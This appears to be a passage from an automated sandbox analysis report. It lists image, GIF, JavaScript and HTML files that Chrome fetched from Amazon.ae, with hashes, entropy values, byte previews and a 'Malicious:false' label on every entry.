                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1..AQ.."23aq.6Rrst.....5B...#4CS...%Db..$......................................................1.!2AQq."C..#$34Babr........5R..............?..tQE..QE..QE..T[^..F.$0..q..K....O......=.b..+....L..UI.&[.U.s.DY.......T~..oQ`...-U..Wx.:....m...s../.X#.!j`..win9..}..j/S..q.|..R.p.nP...8..s.....'>...X.)..'..H..JFo......7.....Z..%s.:u....=...I{;k..0.....n.......K....ik6..M.7.).O...z...".V..Y....m......4.....F..sT~..................T=..m...M.I?)..B?.j.\...W>../.p........ln.....S.r4'B.[._k/gwt..$.1Y[..!\.&..c..Q..g...=.&..8N.cWV.(....aE.S..QE..QE..QE...6.k..$..>3Q..m...k.>3Q..n^l.......B.(....Q@.M.[.._i.......e.E..l.....~..2.X..F.5.@.D.(......Z...ST..9r9M_...x....So.E+....ElV.if...V.B}.....'...SE..o..$....iz)..S[lsU..T.n.kl...M..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, progressive, precision 8, 1500x600, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):44813
                                                                                                                                                                                                                                                                      Entropy (8bit):7.848451852197345
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:4YyLecv1RNAt/+aqCgCgzcPoKPYkjC7OYlKbRhQJRZPlK6a15s8L5qJ:4+ctRi+aPAzcPoKZe79bRZPlNa15b5qJ
                                                                                                                                                                                                                                                                      MD5:4F9A38978B2A7426578DE699227409DE
                                                                                                                                                                                                                                                                      SHA1:1CA377F7C7F40995ED096B4B8915E0754ABEC6D8
                                                                                                                                                                                                                                                                      SHA-256:75670B91659E830954681E97BF5C2875F71C96D1B9B8B7589AA672F480CF57BF
                                                                                                                                                                                                                                                                      SHA-512:07F31BA499C9A57C1EDA9F364D8C3DF6EC266FD0B37F9444C4DB6CA97E5E5AE2016E5587B383CC3EDA87E7981FF1307D5AFB42DFB24E6B4595E7274A0D0624EE
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/51ru0YheBYL._SX1500_.jpg
                                                                                                                                                                                                                                                                      Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (30900)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):30946
                                                                                                                                                                                                                                                                      Entropy (8bit):5.2642111425198035
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:HXhQ+LMasRxYQxky/diedmkDsdJS4Ok0o0MRbjigQeUpteUHiyYNDbDUkBGP95xP:RQms7Hx9F4Ok2rKGPZ
                                                                                                                                                                                                                                                                      MD5:976E8467CE0507E7C353E8CDF51A47AE
                                                                                                                                                                                                                                                                      SHA1:0F3586B696BD6D72B4F479F0006E6646FF8FA065
                                                                                                                                                                                                                                                                      SHA-256:F568DF0B01BA2FD16758F3E126AF7F88E041DA72D13197BCCF925224BF09A98A
                                                                                                                                                                                                                                                                      SHA-512:C7D61A9E9ACB19C220AD429CABEAE9F7570F160BB4D4270E177A996961070417376535BEB75F05A49CE64C225B9A539AD25A526BF4CBA70836052CE994DFB1E7
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/S/apesafeframe/ape/sf/desktop/sf-1.50.af25278b.js
                                                                                                                                                                                                                                                                      Preview:(()=>{const e="sfImpression",t="LightAdImpression",i="viewablelatency",a=(e,t,i)=>({csaKey:e,csmKey:t,csmMessage:i}),s=(a("bodyBegin","bb",e),a("bodyBegin","bb",t),a("bodyEnd","be")),r=(a("clickToATF","af"),a("criticalFeature","cf")),n=(a("criticalFeature","cf",e),a("criticalFeature","cf",t),a("loaded","ld")),o=a("loaded","ld",e),l=(a("loaded","ld",t),a("viewablelatency:bodyBegin","bb",i),a("viewablelatency:loaded","ld",i),(e,t)=>{console.error(e,t)}),d=e=>{e.sendLatencyMetric(n),e.sendLatencyMetric(r)},c=e=>"V"===e,h={1027:"Sponsored Display DRA"},m={1:"Enabled",0:"NotEnabled","-1":"Unknown"},u=e=>v(e),v=e=>decodeURIComponent(escape(atob(e))),p=e=>e&&0===Object.keys(e).length&&e.constructor===Object;let g=null,w=null,b=null,f=null,y=null;const M=new class{viewabilityStandards(){return f=f||[],f}payload(){return b=b||{},b}},x={ext:{inViewPercentage:()=>(g=g||0,Math.round(100*g)),geom:()=>(w=w||{},w)}},C={playingTime:()=>(y=y||0,y)},E=()=>M,P=()=>C,T=e=>{var t,i,a,s;g=void 0!==(null==e|
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x254, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):17629
                                                                                                                                                                                                                                                                      Entropy (8bit):7.959299957253685
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:/xOKjOEoH8U2pgS+o2TW8x3dpFJwMEbbO7l7qfZ35:/xjjuHd22PnxNx5EOI5
                                                                                                                                                                                                                                                                      MD5:18E60CDB66BB37F58A8DFF374ADCB698
                                                                                                                                                                                                                                                                      SHA1:3FD25D09464A435D39433B821AFBDCF50DDA1C27
                                                                                                                                                                                                                                                                      SHA-256:03116D383EC89862235BD2746DDD925CFFA2B12054E4F1F742B1BE9555B505E3
                                                                                                                                                                                                                                                                      SHA-512:6171E9F7B0EF255AF8CCDE78BA24E23E2C23DC6F227B5B13DF49453837FA73AD1C45C091760EBF9FB28FAEFBA8886070F2AAC6755844FC015A6833856002B674
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........@.."..........5.......................................................................1......^.e... g.........V...C.Zo.N.i.Ok..E.Sg....S....................m&.+..`t..xHu."..C..y0.JV..j....Nw.v5am..........[..0....9.'..>n>.....6....s...v.......s..Vc..+M'Y.m.(I!.M..-.#....s..v.z..n&\.i.%2Z........Z1....0H.....5N0.....I.+.Z..a,.}E......,..$.A..A..X.......[5.'.......}..+9..j....2..l.Zq..]..Rwa.[Y=.C|D....9e.Vd_.p..u.;.~..S]M.......nu.K......n#6.g.5m..[.....]2S...V.,$..G.j....vY..>J..s....Y.....']....|.l..n...+...F.c.y....>..A..+.{..-....r.2..zl.5..w.]})b.....R.`.A.^..V..wu,.-..V...`..F....3.,..=-........-.%v...S4}.76.C.tV.Z..Z.=.H..+.......=~..vL..w.."cm....wX:.|/..........s.@N..l.ObQ4..u..N)....;.u.6{'.....6.V...8.1...3G.VW...&.^.0x.s..^...;Xk+57m(..Vw...."..W.!Bd..d.W........w.9F.z.o
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x320, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):25875
                                                                                                                                                                                                                                                                      Entropy (8bit):7.970511114194834
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:crsoR60M1qR6BOUJYY6/3uTv5PGXCQcf4XtS:LoR9K0tshV
                                                                                                                                                                                                                                                                      MD5:09CD80089DEA7F114AF34074F573B40A
                                                                                                                                                                                                                                                                      SHA1:CF20358B69015EBCCDD6FCBBCBEC9451C8A2E176
                                                                                                                                                                                                                                                                      SHA-256:2F764EA996B9DFBCC3BF3A832BE88942026196FC4B803CB771FE186C437FB1AB
                                                                                                                                                                                                                                                                      SHA-512:6C7729B21CCC488605F8C92D45F0BEADC06A30D59EBD44A045916BA73DAF598E770EFB165A37A3165FAF030DD2A423E4A172D45B5063A044E4A8445A7C1A0178
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@.@.."..........5....................................................................`..w...v....j.x..tc...j.....(.U...K...m..uzv.I.B..N.-.!..g...gFk...dO...vy.>.gFfgvf{=.ftx...\T.H...H....(.m.A.$.0.....W*i+.p:.t.....2.....x...L.......6..i....3......s3.3.zu...D..$,-.^..4.........`...:...L...k#.s.E$.-...*...|.\j...88..|*.b.}V..=.<.mI~fy..g..m.=......4.M[9.....^.b....9.J......_D.....R..vls...fn>#.U..k..yi.t..UT)....j..=..@U.(.Y.k..9...-....o._.$w...dM+]^..g1vz..^q_. 0.2.u.O..P0...S....:.J....<....l...>.-A;B.V....Z%...:jH..R......$..q..m{..=!.....H.os..W.F_....3.>.I....'.{.2L..r.K..J&4M.)....PH...%.,..Zr...c...!..0$..~...5Z..{7..1....j..#./*....p...r.0..Et.&+.kh%..l...o...Xn...b,&..3..3...}...#.<.Mi..r..]....-..L..J.U'..b....P#.K_..g.....C1A..eC..k.`..........K..=..)H.QJ.;.%.[.2.Ly.d
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                                                                                      MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                                                                                      SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                                                                                      SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                                                                                      SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:RP6015S40NY7Z1AX6ZEM$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295509.0%26id%3DRP6015S40NY7Z1AX6ZEM%26m%3D1%26sc%3Dcsa%3AendVL%26pc%3D12737%26at%3D12737%26t%3D1724264943923%26csmtags%3DendVL%26pty%3DSearch%26spty%3DList%26pti%3Dundefined%26tid%3DRP6015S40NY7Z1AX6ZEM%26aftb%3D1%26lob%3D1:12737
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):4391
                                                                                                                                                                                                                                                                      Entropy (8bit):7.868917454643888
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:iwzyWGcaOloUcyBBWyjvCynaOLwgPEX21nAGHqDtJx6s:iwzyWGcaOlRcyBBWy2ynaOsk1A+oos
                                                                                                                                                                                                                                                                      MD5:CAB8D990B65DDF4107385735E797C0DA
                                                                                                                                                                                                                                                                      SHA1:9CA3317C28B9C0F7FEB1AA303FB795E4200B7EB8
                                                                                                                                                                                                                                                                      SHA-256:4178C50A1E51E21AD7645F9D0F79CD6123B5D41AB50EDBC7F596CC151B8DD327
                                                                                                                                                                                                                                                                      SHA-512:D2789C8FBFEE842E79B6176A2399308D414C4C661005E3017AE4990896081125633172D34BCB241B9E364E5BC22793334919AB188D2827E93F99419D0378BD60
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/1741539_QC-HPC-Personalcare_186x116_2X_en_AE._SY116_CB566996700_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF...........................................)......)$,$!$,$A3--3AK?<?K[QQ[rlr................................)......)$,$!$,$A3--3AK?<?K[QQ[rlr.........t...."..........4.................................................................i.<.|.....k..B..^.(.8.....Z.q#.G.L..#A...Vy...W.7b+.T.A.....Y.....oV\....[.l!V./...........=..Jt..$..P....B...X:R...}+.r~bc..T..H..~...z|.\....k.p....>..%.....3......hO..Y5....b.F.....l..9...5.r:.y.|8...F.....p..d6..}...S=K.c...<].S.?B..:.............V....p:'.....]..o........Fkb..{#.q.R...g..gQ..}..I....p.D..9wQ.......,.4..!....:.\..d..3/.&.....jLO~<c...P.......a1.P.=.....@......'M....(.....H..........................!1."AQ...Ta.02R... #qst..$%4d....3BCDSr.............?.......h...G+......X.c_.s...1..)..?........k...|..7.G......1.n.........1.n..........k.{.|..7...k...|.~$Q.1.C...Wq.q.t...}'.}.6.....C...N..Et*.V...V.D.=....0....FEj.....F..<F....6..........Mmo">.L.%.#V............F.......<..8...oV..Y$.A..f{.V.. ....y%..Ib
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                                                                                      MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                                                                                      SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                                                                                      SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                                                                                      SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):10699
                                                                                                                                                                                                                                                                      Entropy (8bit):7.819525252544032
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:M/l4fwJgXrT0Xz5+GDTixvWeZBPMr64Y5ObC6odwFky3rv3YeKcFH/Wg:ilBgXv0D0qeZWCpM24Y5Ztds7rK7g
                                                                                                                                                                                                                                                                      MD5:5397558A515A151660B58366420160D5
                                                                                                                                                                                                                                                                      SHA1:4830FB0B5944DFDCB02234224EDF9A50B430320B
                                                                                                                                                                                                                                                                      SHA-256:99B7C4686A2D0F6FD95B6B0F6661E68AE61CB79094E5B8B7770A6E26B4EDC172
                                                                                                                                                                                                                                                                      SHA-512:773E12AC3669D56B2441FC815A5785ADD897A9EAD636E26ED74AD4358EAE17E148A420B9C9408C785B8FA1F12BB9BF8D6F57FCE61CB5642630B7B3D30943CFAA
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/I/41IU10DZeDL._SR480,440_.jpg"
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3.............................................................................................................................................................[@...^........................^.d.-....AGt$Tp$tma&!.X..5...1.t...J9...$....s..E9.,Nb.............h.../..>F.g?..=...;y.^...*.e.8.5M.[..>[.i..s8j...N.j..wF.._.+._...+3.N.................K.Gr$}.3.{wS.Z@...M...g..=|..|."m's.:....r....ks./.....d.H....1..Ws..I..............Hq..._b.Yei....;....9{s...W.o.H....G.".V(.....;.a...c.6r..M.c..........f.............#i&5.^.~..._........MvK..."....6mS7...%L.....<iz.o.f..h..vr.....}..........u.................O+.~..}.s..._.w.o.....M....._T..e..w7t.-o:.....>._^R...=..OV.5,...................Nu....%.Y.z......e.u..4.Sh..%.....7..z#..R.Q.%d..l.[L.........Ct...e+................o..?:...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):71
                                                                                                                                                                                                                                                                      Entropy (8bit):4.19644707821733
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                                                                                      MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                                                                                      SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                                                                                      SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                                                                                      SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://www.amazon.ae/rd/uedata?at&v=0.295396.0&id=SX0TR1HXR3TVBG1JQK3B&ctb=1&m=1&sc=SX0TR1HXR3TVBG1JQK3B&pc=12250&at=12250&t=1724264979090&csmtags=csm-feature-touch-enabled:false&pty=Landing&spty=BrowsePage&pti=11601212031&tid=SX0TR1HXR3TVBG1JQK3B&aftb=1&lob=1
                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):56755
                                                                                                                                                                                                                                                                      Entropy (8bit):7.973406642815217
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:VtMKW43ZIHxIlLasEzXjw4jGeDZbToj4Aig1Ct5Er:NWqORyLdEzz9Qj4Aig0bEr
                                                                                                                                                                                                                                                                      MD5:BE236EBEF7B0090BFFCF31A5181B1BAF
                                                                                                                                                                                                                                                                      SHA1:0F52B2342A6236339EFAA5A98DCD061884CF9C91
                                                                                                                                                                                                                                                                      SHA-256:338A305336D450EEEB81068B22C7A34FF69B43732EB2EDF0EDD6549F12A21416
                                                                                                                                                                                                                                                                      SHA-512:FAC9572E8F750BFE0F3985CBF0290E1D5F16505ECEB1F977A1313B9B9D217A8DB7CFA21EB3FC0AABE5D3BF2F76C947B5CD8FA8384AD4A62247467B1A97249970
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................................................................................................;...................................................................................[a.....]...p.6.[..}G.z.+......k..i\..cV...............>`..`....{/X.s.4..p....*...[...&....q..p..........:4.....+i.y.q........+l.lJ....cnp.z.*..........~..N...B6B..k........*..2w.[..a..............h.....'"................6...........?.&[.......>...........+R.... 6o.......D=..ho.[....................Jf,m...=.W.:#.5.#..|.....y5...........h..{..........0.............vK.v[.~S.C..,.s_.@5....."...D9.............c..K........0....w.......Z.07.]........'2...............?.~.]\.eXj......f..X.......ML.;M.@..(.ivc#.{..............@...xx......>3...V..|.Z3..Q.F...B.'.~.i.}..0........a./...........;|5....f.^.f.}..u.(..i....G...&"..e....S.+.....;.&=s.n_o0.._L..".~...........x..u.P..-f..=ssV...{.R..!r}...?.P.}..E.l~L.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):5795
                                                                                                                                                                                                                                                                      Entropy (8bit):7.862691822522222
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:CG8WR10eFGTiWS/Wrr/imDD+OkiE0My+V8Z9A8S4TZVWaJjpmmB/A0ZaB0+jbgw9:CG/RSeFv/kpD+b2M58Z9A8FbJ9mm9A0e
                                                                                                                                                                                                                                                                      MD5:9CF98A02D92FDD1D895974B86A5608AC
                                                                                                                                                                                                                                                                      SHA1:2ACA48049156605E7493B7A7C5F83FFE1059420E
                                                                                                                                                                                                                                                                      SHA-256:2C949E574DE0A6E859A38CD3431A0898DC9015520552EFA3DEBADEF7D8683FB2
                                                                                                                                                                                                                                                                      SHA-512:C404CD915D3D0BC357C7C504723E26A2139D732A409F411A6E2AA36F94371352ED9FEE3E570425524E0C41B85581141D0A6FC64B5C30083F1FFA807C71985FEB
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................................................................................t...."..........9............................................................................:.....S..b...7:NCC.=G.6....5/.p..NL..D.N...l....%..R.t..Ty...".JR.y...s.zi....=.K.4..{R...3.f.....|..=...u..\..u..=w.~cX.Q..,.}..H...w.m...R... .i[.}....t;.^.'h................c.2*u@/...W.`6.`6..6..(.....-..s..n....F...!8J...K^.-T...Doa..^...7....y..T.*.@B.=...A=./.>.mc.[lc....\V........l`..i.6.o.w.. ...........K...'..y..S-o@M[.=c4[./.C..Ho...I1.b.wg..s.q.mSn%9{.S+.+..{. ...T.).S..#.K.z...Gc..(....".w.....xv-H+MY.6v%G...x.+....`.........A..9.......x.$.~@A..ja.{...-............................0.. !#1."2$4ABC...........O.8....)..R/.E.2m...............K...$..G.....7?...X............j..+I[....@..,.....S......Z.F.[.P.]..b...j..F.........7!..N.dU'.K.n.J`..,Z.j...........J.mS......ga(.7r*.b..,O...E*),.#...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):12914
                                                                                                                                                                                                                                                                      Entropy (8bit):7.899040090858498
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:YRg5hcCLUBXeeIRmaPJpuV17ReLBoz1VWvTxhUvc8QXuWRJ3fjoQDQZuf0Ik:YUhNoBYPPGdRTZWTxlNhvfjoQDQyk
                                                                                                                                                                                                                                                                      MD5:682A2C97EDA77C422EDD117FC4AEC43B
                                                                                                                                                                                                                                                                      SHA1:0A1448C6FB56C68FDE2BAAACC9795499EE4D2FBA
                                                                                                                                                                                                                                                                      SHA-256:DEE025E33DFC4BB9DFD84B450EF88BFA2DD25496768AD765CFEA00DC9FDF210B
                                                                                                                                                                                                                                                                      SHA-512:1BD3DE86DDBD95F8772991EF23542B6BDBAD159EED439DBE52DB92F4C76508C8AA2BB59B9CC1E89D8966A5BCD6849DC91DE8436AE8BF97003AD87601A5C08778
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259751_400x400_2X._CB617696541_.jpg
